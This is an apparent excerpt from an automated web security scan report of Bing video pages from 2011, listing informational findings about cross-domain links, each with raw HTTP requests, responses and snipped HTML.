<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.404. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76329
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.437 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:04 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=71398422999D4434A086293033409942; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c90f8b31c25db49fb9066aaa59d9cc4f4; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=2ad67e67-47ed-49d5-bcb7-5a3dd74e74d6&amp;w=400&amp;h=300&amp;so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fglee-season-2-volume-1-dvd-extra-rocky-horror%2f5svqwfs%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;tv.redacted&#47;tv&#47;series.aspx&#63;series&#61;ddba98ad-bf4b-4293-bf0f-e4f053bf735d" data-instName="InfoRelatedLinks">Learn more about 'Glee'</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;tv.redacted&#47;" data-instName="InfoRelatedLinks">MSN TV</a>
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.405. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll&gt1=31036 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 110111
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:32 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.062 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:32 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=31036; domain=.bing.com; path=/videos
Set-Cookie: ocid=31036; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B5B3B7F99F7E42BBBB4D99A3E9BD0689; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2caf34df9069e94b079e21d3eb6a21ddf2; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=086e62e8-bf4c-4491-a61f-fb322fe0fb30&amp;w=400&amp;h=300&amp;so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fhealthy-body-healthy-wallet%2f1d3rfv95o%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
uss&#32;how&#32;health&#32;care&#32;reform&#32;will&#32;affect&#32;the&#32;health&#32;care&#32;sector&#32;and&#32;what&#32;stocks&#32;in&#32;the&#32;group&#32;are&#32;poised&#32;to&#32;benefit." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;608cb71f-dc78-4abf-8dd8-c30b68871b8f&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
bill,&#32;yet&#32;they&#32;refuse&#32;to&#32;give&#32;up&#32;their&#32;own&#32;government-sponsored&#32;health&#32;care.&#32;Rep.&#32;Steve&#32;Israel&#32;talks&#32;about&#32;the&#32;hypocrisy." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;f589e128-359f-43b7-8a73-1c9bf7292ee1&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
32;the&#32;responsibility&#32;of&#32;the&#32;community&#32;to&#32;deal&#32;with&#32;mental&#32;health&#32;issues&#32;because&#32;the&#32;consequences&#32;could&#32;affect&#32;any&#32;of&#32;us." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e825d2c4-c863-464f-b0d4-96a0a2b6da24&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
talks&#32;about&#32;the&#32;irony&#32;of&#32;the&#32;situation&#32;because&#32;Harris&#8217;&#32;platform&#32;opposed&#32;a&#32;public&#32;option&#32;to&#32;buy&#32;federal&#32;health&#32;care." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;a8c1a498-6626-473c-bd64-00a13b34440e&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;s&#32;remarks&#32;on&#32;the&#32;U.S.&#32;health-care&#32;system&#32;during&#32;last&#32;night&#39;s&#32;State&#32;of&#32;the&#32;Union&#32;address.&#32;&#10;&#32;&#32;&#32;&#32;&#32;Shalal..." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;daf88b9e-6bc8-4995-919c-0eca80215ca7&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
d&#32;a&#32;future&#32;doctor&#32;are&#32;deeply&#32;divided&#32;over&#32;the&#32;public&#32;option&#32;and&#32;universal&#32;health&#32;care.&#32;NBC&#8217;s&#32;Chris&#32;Jansing&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;222c5547-6db0-49a0-a214-c5657b911593&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ple&#32;with&#32;decent&#32;health&#32;insurance&#63;&#32;Consumer&#32;Reports&#32;questions&#32;the&#32;Secretary&#32;of&#32;Health&#32;&#38;&#32;Human&#32;Services,&#32;Kathleen&#32;Sebelius." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e6d56a2d-a19d-41a0-b17e-45384969dc27&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
hpa?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="Eight&#32;good&#32;things&#32;coming&#32;from&#32;the&#32;recently&#32;passed&#32;health&#32;care&#32;reform&#32;legislation." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9ed95b9b-89f0-49ab-aa9c-71252bc7eee2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
nsurance-dollar-100-a-month/3xoea4h7?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="A&#32;new&#32;solution&#32;to&#32;health&#32;care&#32;eliminates&#32;insurance&#32;entirely." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;1c6e5217-2840-76fd-9659-1351ce5074a9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;Roth,&#32;of&#32;Action&#32;Against&#32;Obesity,&#32;and&#32;Jeff&#32;Stier,&#32;of&#32;the&#32;American&#32;Council&#32;on&#32;Science&#32;&#38;&#32;Health,&#32;share&#32;their&#32;views." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;1c995d94-3821-4162-9bbc-4329f6909bb5&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.406. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll&gt1=31036 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=87
Content-Length: 109958
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:40 GMT
Connection: close
Set-Cookie: _SS=SID=AFAEE88F80244F31BA61267DDD63D882; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c38df48ccabfb45a68f9bf51ef2a8bfa1; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=086e62e8-bf4c-4491-a61f-fb322fe0fb30&amp;w=400&amp;h=300&amp;so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fhealthy-body-healthy-wallet%2f1d3rfv95o%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
uss&#32;how&#32;health&#32;care&#32;reform&#32;will&#32;affect&#32;the&#32;health&#32;care&#32;sector&#32;and&#32;what&#32;stocks&#32;in&#32;the&#32;group&#32;are&#32;poised&#32;to&#32;benefit." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;608cb71f-dc78-4abf-8dd8-c30b68871b8f&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
bill,&#32;yet&#32;they&#32;refuse&#32;to&#32;give&#32;up&#32;their&#32;own&#32;government-sponsored&#32;health&#32;care.&#32;Rep.&#32;Steve&#32;Israel&#32;talks&#32;about&#32;the&#32;hypocrisy." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;f589e128-359f-43b7-8a73-1c9bf7292ee1&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
32;the&#32;responsibility&#32;of&#32;the&#32;community&#32;to&#32;deal&#32;with&#32;mental&#32;health&#32;issues&#32;because&#32;the&#32;consequences&#32;could&#32;affect&#32;any&#32;of&#32;us." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e825d2c4-c863-464f-b0d4-96a0a2b6da24&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
talks&#32;about&#32;the&#32;irony&#32;of&#32;the&#32;situation&#32;because&#32;Harris&#8217;&#32;platform&#32;opposed&#32;a&#32;public&#32;option&#32;to&#32;buy&#32;federal&#32;health&#32;care." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;a8c1a498-6626-473c-bd64-00a13b34440e&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;s&#32;remarks&#32;on&#32;the&#32;U.S.&#32;health-care&#32;system&#32;during&#32;last&#32;night&#39;s&#32;State&#32;of&#32;the&#32;Union&#32;address.&#32;&#10;&#32;&#32;&#32;&#32;&#32;Shalal..." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;daf88b9e-6bc8-4995-919c-0eca80215ca7&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
nsurance-dollar-100-a-month/3xoea4h7?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="A&#32;new&#32;solution&#32;to&#32;health&#32;care&#32;eliminates&#32;insurance&#32;entirely." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;1c6e5217-2840-76fd-9659-1351ce5074a9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

